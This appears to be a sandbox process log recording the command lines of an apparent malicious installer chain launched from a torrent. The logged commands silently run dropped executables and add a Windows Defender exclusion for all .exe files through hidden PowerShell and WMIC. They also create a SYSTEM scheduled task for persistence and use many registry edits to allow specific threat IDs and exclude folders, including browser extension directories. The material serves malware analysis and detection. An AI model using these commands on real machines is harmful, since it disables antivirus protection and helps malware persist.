C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2288

C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe

C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktopGX --annotation=ver=114.0.5282.202 --initial-client-data=0x338,0x33c,0x340,0x308,0x344,0x6f6d8c5c,0x6f6d8c68,0x6f6d8c74

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1724

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2008

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1812

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2004

C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe

"C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe" "C:\Users\Admin\Documents\the-longing-codex.torrent" /SHELLASSOC

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\pNRn8PJQ\IFVII4XGy4B4o.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\pNRn8PJQ\IFVII4XGy4B4o.exe"

C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202411150355201\assistant\Opera_GX_assistant_73.0.3856.382_Setup.exe_sfx.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202411150355201\assistant\Opera_GX_assistant_73.0.3856.382_Setup.exe_sfx.exe"

C:\Users\Admin\AppData\Local\Temp\pNRn8PJQ\IFVII4XGy4B4o.exe

C:\Users\Admin\AppData\Local\Temp\pNRn8PJQ\IFVII4XGy4B4o.exe /VERYSILENT

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 2404 -ip 2404

C:\Users\Admin\AppData\Local\Temp\is-3M3MK.tmp\IFVII4XGy4B4o.tmp

"C:\Users\Admin\AppData\Local\Temp\is-3M3MK.tmp\IFVII4XGy4B4o.tmp" /SL5="$304D6,2448307,138752,C:\Users\Admin\AppData\Local\Temp\pNRn8PJQ\IFVII4XGy4B4o.exe" /VERYSILENT

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2364

C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202411150355201\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202411150355201\assistant\assistant_installer.exe" --version

C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202411150355201\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202411150355201\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktopGX --annotation=ver=73.0.3856.382 --initial-client-data=0x2a4,0x2a8,0x2ac,0x280,0x2b0,0xdb4f48,0xdb4f58,0xdb4f64

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\oKIyrUJE\ZG2ecJn9.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2220

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\oKIyrUJE\ZG2ecJn9.exe"

C:\Users\Admin\AppData\Local\Temp\oKIyrUJE\ZG2ecJn9.exe

C:\Users\Admin\AppData\Local\Temp\oKIyrUJE\ZG2ecJn9.exe /did=757674 /S

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1772

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1992

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m help.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bhzAbyJhiYArNEwhRY" /SC once /ST 03:56:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\oKIyrUJE\ZG2ecJn9.exe\" Y8 /pjudidxH 757674 /S" /V1 /F

C:\Users\Admin\AppData\Local\Temp\oKIyrUJE\ZG2ecJn9.exe

C:\Users\Admin\AppData\Local\Temp\oKIyrUJE\ZG2ecJn9.exe Y8 /pjudidxH 757674 /S

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147914824\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147914824\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147914824 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147914824 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NOWTtjuGDiydC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NOWTtjuGDiydC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OMeOFycTU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OMeOFycTU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RnBNRnIwUzVU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RnBNRnIwUzVU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cXihOdOJPkHrzxTrZPR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cXihOdOJPkHrzxTrZPR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kmKpunNFSNUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kmKpunNFSNUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\TtvXSoLtbVXOCJVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\TtvXSoLtbVXOCJVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\VBkUndoRUYbskVcRK\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\VBkUndoRUYbskVcRK\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\rLJCaCpfIrfYjdgZ\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\rLJCaCpfIrfYjdgZ\" /t REG_DWORD /d 0 /reg:64;"

C:\ProgramData\uTorrent\utorrent9.exe

"C:\ProgramData\uTorrent\utorrent9.exe" /VERYSILENT

C:\Users\Admin\AppData\Local\Temp\is-5SD8N.tmp\utorrent9.tmp

"C:\Users\Admin\AppData\Local\Temp\is-5SD8N.tmp\utorrent9.tmp" /SL5="$3071E,832512,832512,C:\ProgramData\uTorrent\utorrent9.exe" /VERYSILENT

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NOWTtjuGDiydC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NOWTtjuGDiydC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NOWTtjuGDiydC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OMeOFycTU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OMeOFycTU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RnBNRnIwUzVU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RnBNRnIwUzVU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cXihOdOJPkHrzxTrZPR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cXihOdOJPkHrzxTrZPR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kmKpunNFSNUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kmKpunNFSNUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\TtvXSoLtbVXOCJVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\TtvXSoLtbVXOCJVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\VBkUndoRUYbskVcRK /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\VBkUndoRUYbskVcRK /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\rLJCaCpfIrfYjdgZ /t REG_DWORD /d 0 /reg:32

